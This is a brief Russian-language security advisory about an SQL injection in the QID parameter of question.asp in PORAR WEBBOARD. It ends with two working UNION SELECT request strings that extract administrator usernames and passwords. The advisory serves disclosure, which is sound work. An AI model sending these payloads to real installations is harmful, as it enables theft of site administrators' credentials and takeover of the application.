Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: PORAR WEBBOARD
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «QID» сценарием question.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
question.asp?QID=-1122334455%20+%20union%20+ %20select%20+%200,null,2,username,password,5,password,7,8,9, null%20+%20from%20+%20+%20administrator%20';';
question.asp?QID=-1%20+%20union%20+%20select%20+ %200,1,2,username,4,5,password,7,8,9,10,11%20+%20from%20+ %20+%20administrator%20';';